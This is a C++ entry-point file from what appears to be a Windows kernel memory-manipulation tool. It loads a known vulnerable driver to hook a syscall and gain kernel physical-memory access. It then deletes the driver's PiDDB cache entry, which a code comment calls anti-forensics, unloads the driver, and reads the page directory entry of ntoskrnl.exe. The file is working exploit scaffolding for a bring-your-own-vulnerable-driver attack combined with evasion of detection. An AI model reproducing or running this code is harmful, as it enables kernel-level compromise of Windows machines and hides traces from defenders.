PTM/nasa-tables/main.cpp

#include <cstdio>
#include <iostream>
#include <utility>

#include "kernel_ctx/kernel_ctx.h"
#include "mem_ctx/mem_ctx.hpp"
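// Entry point.
//
// Sequence, as visible here: load the helper driver (nasa::load_drv), build a
// nasa::kernel_ctx and report the syscall-hook state, remove the driver's
// PiDDB cache entry, unload the driver (nasa::unload_drv), then look up the
// PDE of ntoskrnl.exe through a nasa::mem_ctx for this process and print its
// fields. argc/argv are not used.
//
// Returns -1 when the driver cannot be loaded or unloaded, 0 otherwise.
int __cdecl main(int argc, char** argv)
{
    if (!nasa::load_drv())
    {
        std::printf("[!] unable to load vulnerable driver... run as admin?\n");
        return -1;
    }

    nasa::kernel_ctx kernel;
    std::printf("[+] %s mapped physical page -> 0x%p\n", nasa::syscall_hook.first.data(), nasa::psyscall_func.load());
    std::printf("[+] %s page offset -> 0x%x\n", nasa::syscall_hook.first.data(), nasa::nt_page_offset);

    // clear piddb cache table entry for vulnerable driver...
    // NOTE(review): this is an anti-forensics step -- it erases the record of
    // the driver load kept in PiDDBCacheTable, so detection of driver loads
    // should not rely on that table alone. The call is best-effort: the
    // program continues whether or not the entry was removed.
    //
    // The two-step named cast is the exact equivalent of the previous C-style
    // `(void*)raw_driver` and works whether raw_driver is declared const or not.
    if (kernel.clear_piddb_cache(nasa::drv_key,
            util::get_file_header(const_cast<void*>(static_cast<const void*>(raw_driver)))->TimeDateStamp))
        std::printf("[+] Removed PIDDB Cache entry for physmeme driver...\n");
    else
        std::printf("[!] unable to clear PIDDB Cache entry for vulnerable driver...\n");

    if (!nasa::unload_drv())
    {
        std::printf("[!] unable to unload vulnerable driver... close all handles?\n");
        return -1;
    }

    // pid of this process and the base of ntoskrnl.exe; the base is wrapped in
    // virt_addr_t so its .value can be handed to get_pde below
    const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(),
        virt_addr_t{ reinterpret_cast<void*>(util::get_kernel_module_base("ntoskrnl.exe")) } };

    // std::hex / std::showbase are sticky on std::cout. '\n' replaces
    // std::endl: std::cin is tied to std::cout, so std::cin.get() below
    // flushes the stream before blocking anyway.
    std::cout << "[+] my pid: " << std::hex << my_proc_data.first << '\n';
    std::cout << "[+] kernel base: " << std::showbase << std::hex << my_proc_data.second.value << '\n';

    nasa::mem_ctx my_proc(kernel, my_proc_data.first);
    const auto ntoskrnl_pde = my_proc.get_pde(my_proc_data.second.value);

    // ntoskrnl is allocated in 2mb large pages :)
    std::printf("[+] page present -> %d\n", ntoskrnl_pde.second.present);
    std::printf("[+] page frame number -> 0x%x\n", ntoskrnl_pde.second.pfn);
    std::printf("[+] large page -> %d\n", ntoskrnl_pde.second.page_size);

    // keep the console open until a key is pressed
    std::cin.get();
    return 0;
}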